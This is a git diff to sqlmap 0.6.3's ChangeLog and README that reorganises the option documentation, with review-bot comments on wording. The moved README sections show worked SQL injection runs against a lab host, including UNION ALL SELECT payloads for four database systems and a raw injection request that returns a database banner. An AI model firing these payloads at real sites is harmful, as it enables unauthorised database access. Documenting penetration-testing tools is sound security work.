diff --git a/doc/ChangeLog b/doc/ChangeLog index 509a41a92..4bebfcfbe 100644 --- a/doc/ChangeLog +++ b/doc/ChangeLog @@ -13,6 +13,8 @@ sqlmap (0.6.3-1) stable; urgency=low the web application technology by parsing some HTTP response headers; * Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided; + * Minor enhancement to be able to specify the number of seconds before + timeout the connection, default is set to 10 seconds; * Minor enhancement to be able to specify the number of seconds to wait between each HTTP request providing option --delay #; * Minor enhancement to be able to enumerate table columns and dump table 
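Review bot: the new ChangeLog entry "specify the number of seconds before timeout the connection" is ungrammatical and, unlike the --delay entry directly below it, never names the option it introduces; suggest "* Minor enhancement to be able to specify the number of seconds to wait before the connection times out providing option --timeout #, default is 10 seconds;" so the flag can be found by searching the ChangeLog.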
@@ -23,15 +25,20 @@ sqlmap (0.6.3-1) stable; urgency=low client HTTP headers (Accept, Accept-Encoding, etc); * Minor improvements to sqlmap Debian package files: sqlmap uploaded to official Debian project repository, on queue at the moment; - * Major bug fix to correctly handle httplib.BadStatusLine exception; - * Minor bug fix to handle session.error and session.timeout in HTTP - requests; - * Minor bug fix so that when the user provide a SELECT statement to be + * Minor improvement to use Python psyco (http://psyco.sourceforge.net/) + library if available to speed up the sqlmap algorithmic operations; + * Minor improvement to retry the HTTP request up to three times in case + an exception is raised during the connection to the target url; + * Major bug fix to correctly enumerate columns on Microsoft SQL Server; + * Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM there is no database name specified; - * Minor bug fix to correctly enumerate columns on Microsoft SQL Server; * Minor bug fix to correctly dump table entries when the column is provided; + * Minor bug fix to correctly handle session.error, session.timeout and + httplib.BadStatusLine exceptions in HTTP requests; + * Minor bug fix to correctly catch connection exceptions and notify to + the user also if they occur within a thread; * Increased default output level from 0 to 1; * Updated documentation. diff --git a/doc/README.html b/doc/README.html index da2b257be..bdc54239e 100644 --- a/doc/README.html +++ b/doc/README.html @@ -37,14 +37,15 @@ for the latest version.

5. Usage

6. Disclaimer

@@ -84,10 +85,13 @@ Windows users can download and install the Python setup-ready installer for x86, AMD64 and Itanium too.

Optionally, if you are running sqlmap on Windows, you may wish to install PyReadline -to be able to take advantage of the sqlmap TAB completion and history -support functionalities in the SQL shell and OS shell. +library to be able to take advantage of the sqlmap TAB completion and +history support functionalities in the SQL shell and OS shell. Note that these functionalities are available natively by Python official -readline library on other operating systems.

+readline library on other operating systems. +You can also choose to install +Psyco +library to speed up the sqlmap algorithmic operations.

1.2 Scenario @@ -348,20 +352,25 @@ $ python sqlmap.py -h sqlmap/0.6.3 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com> and Daniele Bellucci <daniele.bellucci@gmail.com> - -Usage: sqlmap.py [options] {-u "<URL>" | -g "<google dork>" | -c "<config file>"} + +Usage: sqlmap.py [options] Options: --version show program's version number and exit -h, --help show this help message and exit - Request: - These options have to be specified to set the target url, HTTP method, - how to connect to the target url or Google dorking results in general. + Target: + At least one of these options has to be specified to set the source to + get target urls from. -u URL, --url=URL Target url + -l LIST Parse targets from Burp or WebScarab logs -g GOOGLEDORK Process Google dork results as target urls - -p TESTPARAMETER Testable parameter(s) + -c CONFIGFILE Load options from a configuration INI file + + Request: + These options can be used to specify how to connect to the target url. + --method=METHOD HTTP method, GET or POST (default: GET) --data=DATA Data string to be sent through POST --cookie=COOKIE HTTP Cookie header @@ -373,8 +382,10 @@ Options: --proxy=PROXY Use a HTTP proxy to connect to the target url --threads=THREADS Maximum number of concurrent HTTP requests (default 1) --delay=DELAY Delay in seconds between each HTTP request + --timeout=TIMEOUT Seconds to wait before timeout connection (default 10) Injection: + -p TESTPARAMETER Testable parameter(s) --string=STRING String to match in page when the query is valid --dbms=DBMS Force back-end DBMS to this value 
@@ -385,11 +396,11 @@ Options: --time-test Test for Time based blind SQL injection --union-test Test for UNION query (inband) SQL injection - --union-use Use the UNION query (inband) SQL injection to - retrieve the queries output. No need to go blind + --union-use Use the UNION query (inband) SQL injection to retrieve + the queries output. No need to go blind Fingerprint: - -f, --fingerprint Perform an extensive database fingerprint + -f, --fingerprint Perform an extensive DBMS version fingerprint Enumeration: These options can be used to enumerate the back-end database @@ -438,10 +449,9 @@ Options: Miscellaneous: --eta Retrieve each query output length and calculate the estimated time of arrival in real time - -v VERBOSE Verbosity level: 0-5 (default 0) + -v VERBOSE Verbosity level: 0-5 (default 1) --update Update sqlmap to the latest stable version -s SESSIONFILE Save and resume all data retrieved on a session file - -c CONFIGFILE Load options from a configuration INI file --save Save options on a configuration INI file --batch Never ask for user input, use the default behaviour @@ -449,7 +459,7 @@ Options:

-

5.1 Request +

5.1 Target

Target URL
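Review bot: the new --timeout help string "Seconds to wait before timeout connection (default 10)" is ungrammatical; suggest "Seconds to wait before the connection times out (default 10)". In the same run of usage hunks, the Usage line drops the "{-u | -g | -c}" group, so the Target group description is now the only place stating that a target source is required, which is fine, but the -l entry's metavar LIST suggests a list of URLs while its help says it parses Burp or WebScarab logs, so LOGFILE would be clearer.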

@@ -675,7 +685,7 @@ Content-Type: text/html

-

List of targets

+

Parse targets from Burp or WebScarab logs

Option: -l

@@ -725,90 +735,33 @@ want to test this url? [y/N/q] y

-

Testable parameter(s)

+

Load options from a configuration INI file

-

Option: -p

+

Option: -c

-

By default sqlmap tests all GET parameters, POST -parameters, HTTP Cookie header values and HTTP User-Agent -header value for dynamicity and SQL injection vulnerability, but it is -possible to manually specificy the parameter(s) you want sqlmap to perform -tests on comma separeted in order to skip dynamicity tests and perform SQL -injection test and inject directly only against the provided parameter(s).

-

Example on a PostgreSQL 8.2.7 target:

-

-

-
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 \
-  -p "id"
-
-[hh:mm:48] [INFO] testing connection to the target url
-[hh:mm:48] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:49] [INFO] url is stable
-[hh:mm:49] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:49] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:49] [INFO] GET parameter 'id' is dynamic
-[hh:mm:49] [INFO] testing sql injection on GET parameter 'id'
-[hh:mm:49] [INFO] testing numeric/unescaped injection on GET parameter 'id'
-[hh:mm:49] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
-[hh:mm:49] [INFO] GET parameter 'id' is numeric/unescaped injectable
-[hh:mm:49] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:49] [INFO] the injectable parameter requires 0 parenthesis
-[...]
-
-
-

- -

Or, if you want to provide more than one parameter, for instance:

-

-

-
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 \
-  -p "cat,id"
-
-
-

- -

You can also test only the HTTP User-Agent header.

+

It is possible to pass user's options from a configuration INI file, an +example is sqlmap.conf.

Example on a MySQL 5.0.51 target:

-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 1 \
-  -p "user-agent" --user-agent "sqlmap/0.6.3 (http://sqlmap.sourceforge.net)"
+$ python sqlmap.py -c "sqlmap.conf"
 
-[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
-[hh:mm:40] [INFO] testing connection to the target url
-[hh:mm:40] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:41] [INFO] url is stable
-[hh:mm:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:41] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:41] [INFO] testing sql injection on User-Agent parameter 'User-Agent'
-[hh:mm:41] [INFO] testing numeric/unescaped injection on User-Agent parameter 'User-Agent'
-[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is not numeric/unescaped injectable
-[hh:mm:41] [INFO] testing string/single quote injection on User-Agent parameter 'User-Agent'
-[hh:mm:41] [INFO] confirming string/single quote injection on User-Agent parameter 'User-Agent'
-[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is string/single quote injectable
-[hh:mm:41] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
-[hh:mm:41] [INFO] testing MySQL
-[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
-[hh:mm:41] [INFO] retrieved: 44
-[hh:mm:41] [INFO] performed 20 queries in 0 seconds
-[hh:mm:41] [INFO] confirming MySQL
-[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
-[hh:mm:41] [INFO] retrieved: 1
-[hh:mm:41] [INFO] performed 13 queries in 0 seconds
-[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
-[hh:mm:41] [INFO] retrieved: 4
-[hh:mm:41] [INFO] performed 13 queries in 0 seconds
+[hh:mm:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
+[hh:mm:42] [WARNING] GET parameter 'cat' is not dynamic
 back-end DBMS:  MySQL >= 5.0.0
 

+

Note that if you also provide other options from command line, those are +evaluated when running sqlmap and overwrite the same options, if set, in +the configuration file provided.

+ + +

5.2 Request +

HTTP method: GET or POST
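Review bot: the new -c example runs sqlmap with sqlmap.conf but never shows the configuration file, so the reader cannot tell which options produced the two "is not dynamic" warnings and the "back-end DBMS" line; either quote the relevant lines of sqlmap.conf or at least keep the "[...]" elision marker the other examples use between the command and the trimmed output. Wording: "pass user's options from a configuration INI file" reads better as "load options from a configuration INI file", and "overwrite the same options, if set, in the configuration file" should be "override".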

@@ -1213,162 +1166,102 @@ seven HTTP requests, the maximum to retrieve a query output character.

request. The valid value is a float, for instance 0.5.

-

5.2 Techniques +

Seconds to wait before timeout connection

+ +

Option: --timeout

+ +

It is possible to specify a number of seconds to wait before considering +the HTTP connection timed out. The valid value is a float, for instance +10.5.

+ + +

5.3 Injection

-

Test for Time Based Blind SQL injection

+

Testable parameter(s)

-

Option: --time-test

- -

TODO

- - -

Test for UNION query SQL injection

- -

Option: --union-test

- -

It is possible to test if the target URL is affected by an inband -SQL injection vulnerability. -Refer to the Techniques section for details on this SQL injection -technique.

- -

Example on an Oracle XE 10.2.0.1 target:

-

-

-
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&cat=2" \
-  --union-test -v 1
-
-[...]
-back-end DBMS:  Oracle
-
-[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
-[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
-valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
-NULL, NULL, NULL FROM DUAL-- AND 5601=5601&cat=2'
-
-
-

+

Option: -p

+

By default sqlmap tests all GET parameters, POST +parameters, HTTP Cookie header values and HTTP User-Agent +header value for dynamicity and SQL injection vulnerability, but it is +possible to manually specificy the parameter(s) you want sqlmap to perform +tests on comma separeted in order to skip dynamicity tests and perform SQL +injection test and inject directly only against the provided parameter(s).

Example on a PostgreSQL 8.2.7 target:

-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&cat=2" \
-  --union-test -v 1
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 \
+  -p "id"
 
+[hh:mm:48] [INFO] testing connection to the target url
+[hh:mm:48] [INFO] testing if the url is stable, wait a few seconds
+[hh:mm:49] [INFO] url is stable
+[hh:mm:49] [INFO] testing if GET parameter 'id' is dynamic
+[hh:mm:49] [INFO] confirming that GET parameter 'id' is dynamic
+[hh:mm:49] [INFO] GET parameter 'id' is dynamic
+[hh:mm:49] [INFO] testing sql injection on GET parameter 'id'
+[hh:mm:49] [INFO] testing numeric/unescaped injection on GET parameter 'id'
+[hh:mm:49] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
+[hh:mm:49] [INFO] GET parameter 'id' is numeric/unescaped injectable
+[hh:mm:49] [INFO] testing for parenthesis on injectable parameter
+[hh:mm:49] [INFO] the injectable parameter requires 0 parenthesis
 [...]
-back-end DBMS:  PostgreSQL
-
-[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
-[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
-valid union:    'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT 
-NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&cat=2'
 

-

As you can see, the target URL parameter id might be also -affected by an inband SQL injection. -In case this vulnerability is exploitable it is strongly recommended to -use it.

- -

Use the UNION query SQL injection

- -

Option: --union-use

- -

Providing the --union-use parameter, sqlmap will first test if -the target URL is affected by an inband SQL injection -(--union-test) vulnerability then, in case it is vulnerable and -exploitable, it will trigger this vulnerability to retrieve the output of -the SELECT queries.

- -

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

+

Or, if you want to provide more than one parameter, for instance:

-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" -v 1 \
-  --union-use --banner
-
-[...]
-back-end DBMS:  Microsoft SQL Server 2000
-
-[hh:mm:42] [INFO] fetching banner
-[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
-[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
-[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
-[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection 
-vulnerability
-[hh:mm:42] [INFO] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
-CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
-CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
-[hh:mm:42] [INFO] performed 3 queries in 0 seconds
-banner:
----
-Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
-        Aug  6 2000 00:57:48 
-        Copyright (c) 1988-2000 Microsoft Corporation
-        Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
----
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 \
+  -p "cat,id"
 

-

As you can see, the vulnerable parameter (id) is affected by both -blind SQL injection and exploitable inband SQL injection vulnerabilities.

+

You can also test only the HTTP User-Agent header.

Example on a MySQL 5.0.51 target:

-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 5 \
-  --union-use --banner
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \
+  -p "user-agent" --user-agent "sqlmap/0.6.3 (http://sqlmap.sourceforge.net)"
 
-[...]
-[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection 
-vulnerability
-[hh:mm:25] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
-IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL-- 
-AND 6043=6043
-[hh:mm:25] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
-%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
-%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
-06043=6043&cat=2 HTTP/1.1
-Host: 192.168.1.121:80
-User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
-Connection: close
-
-[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Mon, 28 Jul 2008 22:34:25 GMT
-Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
-OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
-X-Powered-By: PHP/5.2.4-2ubuntu5.2
-Content-Length: 194
-Connection: close
-Content-Type: text/html
-
-<html><body>
-<b>SQL results:</b>
-<table border="1">
-<tr><td>1</td><td>luther</td><td>blissett</td></tr>
-<tr><td></td><td>blLOjN5.0.51a-3ubuntu5.2zniYyA</td><td></td></tr>
-</table>
-</body></html>
-
-[hh:mm:25] [INFO] performed 3 queries in 0 seconds
-banner:    '5.0.51a-3ubuntu5.2'
+[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
+[hh:mm:40] [INFO] testing connection to the target url
+[hh:mm:40] [INFO] testing if the url is stable, wait a few seconds
+[hh:mm:41] [INFO] url is stable
+[hh:mm:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
+[hh:mm:41] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic
+[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is dynamic
+[hh:mm:41] [INFO] testing sql injection on User-Agent parameter 'User-Agent'
+[hh:mm:41] [INFO] testing numeric/unescaped injection on User-Agent parameter 'User-Agent'
+[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is not numeric/unescaped injectable
+[hh:mm:41] [INFO] testing string/single quote injection on User-Agent parameter 'User-Agent'
+[hh:mm:41] [INFO] confirming string/single quote injection on User-Agent parameter 'User-Agent'
+[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is string/single quote injectable
+[hh:mm:41] [INFO] testing for parenthesis on injectable parameter
+[hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
+[hh:mm:41] [INFO] testing MySQL
+[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
+[hh:mm:41] [INFO] retrieved: 44
+[hh:mm:41] [INFO] performed 20 queries in 0 seconds
+[hh:mm:41] [INFO] confirming MySQL
+[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
+[hh:mm:41] [INFO] retrieved: 1
+[hh:mm:41] [INFO] performed 13 queries in 0 seconds
+[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
+[hh:mm:41] [INFO] retrieved: 4
+[hh:mm:41] [INFO] performed 13 queries in 0 seconds
+back-end DBMS:  MySQL >= 5.0.0
 

-

As you can see, the MySQL version() function (banner) output is -nested (inband) within the HTTP response page, this makes the inband SQL -injection exploitable.

- - -

5.3 Injection -

String match
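Review bot: the new --timeout section gives only an example value (10.5) and omits the default, while the ChangeLog and the -h output in this same patch both state 10 seconds; add "default is 10 seconds" here so the three stay in sync. The paragraph moved under "Testable parameter(s)" carries over two typos, "specificy" and "separeted"; since the block is being rewritten anyway, fix them to "specify" and "separated".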

@@ -1564,7 +1457,161 @@ back-end database management system. If you do not know it, let sqlmap automatically identify it for you.

-

5.4 Fingerprint +

5.4 Techniques +

+ +

Test for Time Based blind SQL injection

+ +

Option: --time-test

+ +

TODO

+ + +

Test for UNION query SQL injection

+ +

Option: --union-test

+ +

It is possible to test if the target URL is affected by an inband +SQL injection vulnerability. +Refer to the Techniques section for details on this SQL injection +technique.

+ +

Example on an Oracle XE 10.2.0.1 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&cat=2" \
+  --union-test -v 1
+
+[...]
+back-end DBMS:  Oracle
+
+[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
+NULL, NULL, NULL FROM DUAL-- AND 5601=5601&cat=2'
+
+
+

+ +

Example on a PostgreSQL 8.2.7 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&cat=2" \
+  --union-test -v 1
+
+[...]
+back-end DBMS:  PostgreSQL
+
+[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT 
+NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&cat=2'
+
+
+

+ +

As you can see, the target URL parameter id might be also +affected by an inband SQL injection. +In case this vulnerability is exploitable it is strongly recommended to +use it.

+ +

Use the UNION query SQL injection

+ +

Option: --union-use

+ +

Providing the --union-use parameter, sqlmap will first test if +the target URL is affected by an inband SQL injection +(--union-test) vulnerability then, in case it is vulnerable and +exploitable, it will trigger this vulnerability to retrieve the output of +the SELECT queries.

+ +

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" -v 1 \
+  --union-use --banner
+
+[...]
+back-end DBMS:  Microsoft SQL Server 2000
+
+[hh:mm:42] [INFO] fetching banner
+[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
+[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
+[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection 
+vulnerability
+[hh:mm:42] [INFO] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
+CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
+CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
+[hh:mm:42] [INFO] performed 3 queries in 0 seconds
+banner:
+---
+Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
+        Aug  6 2000 00:57:48 
+        Copyright (c) 1988-2000 Microsoft Corporation
+        Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
+---
+
+
+

+ +

As you can see, the vulnerable parameter (id) is affected by both +blind SQL injection and exploitable inband SQL injection vulnerabilities.

+ +

Example on a MySQL 5.0.51 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 5 \
+  --union-use --banner
+
+[...]
+[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection 
+vulnerability
+[hh:mm:25] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
+IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL-- 
+AND 6043=6043
+[hh:mm:25] [TRAFFIC OUT] HTTP request:
+GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
+%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
+%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
+06043=6043&cat=2 HTTP/1.1
+Host: 192.168.1.121:80
+User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
+Connection: close
+
+[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
+Date: Mon, 28 Jul 2008 22:34:25 GMT
+Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
+OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
+X-Powered-By: PHP/5.2.4-2ubuntu5.2
+Content-Length: 194
+Connection: close
+Content-Type: text/html
+
+<html><body>
+<b>SQL results:</b>
+<table border="1">
+<tr><td>1</td><td>luther</td><td>blissett</td></tr>
+<tr><td></td><td>blLOjN5.0.51a-3ubuntu5.2zniYyA</td><td></td></tr>
+</table>
+</body></html>
+
+[hh:mm:25] [INFO] performed 3 queries in 0 seconds
+banner:    '5.0.51a-3ubuntu5.2'
+
+
+

+ +

As you can see, the MySQL version() function (banner) output is +nested (inband) within the HTTP response page, this makes the inband SQL +injection exploitable.

+ + +

5.5 Fingerprint

Extensive database management system fingerprint
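Review bot: the relocated "Test for Time Based blind SQL injection" section still consists of the single word TODO, so this commit ships an empty section into the user-facing README; either leave the heading out until --time-test is documented or replace TODO with a one-line "not yet documented" note. Two smaller points in the same hunk: the heading capitalisation changed from "Time Based Blind" to "Time Based blind", inconsistent with "Test for UNION query SQL injection", and "Refer to the Techniques section for details" now sits inside a section itself numbered 5.4 Techniques, so it should cite the specific section it means.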

@@ -1779,7 +1826,7 @@ parsing library that fetches data from Chip Andrews' SQLSecurity.com site and outputs it to the XML versions file.

-

5.5 Enumeration +

5.6 Enumeration

Banner

@@ -2250,7 +2297,7 @@ databases tables, only the users' schema that the web application's user is connected to, which is always public.

-

Dump database tables entries

+

Dump database table entries

Options: --dump, -C, -T, -D, --start and --stop

@@ -2349,8 +2396,8 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv

-

You can also provide the --start and/or the --stop option -to limit the dump to a range of entries.

+

You can also provide the --start and/or the --stop +options to limit the dump to a range of entries.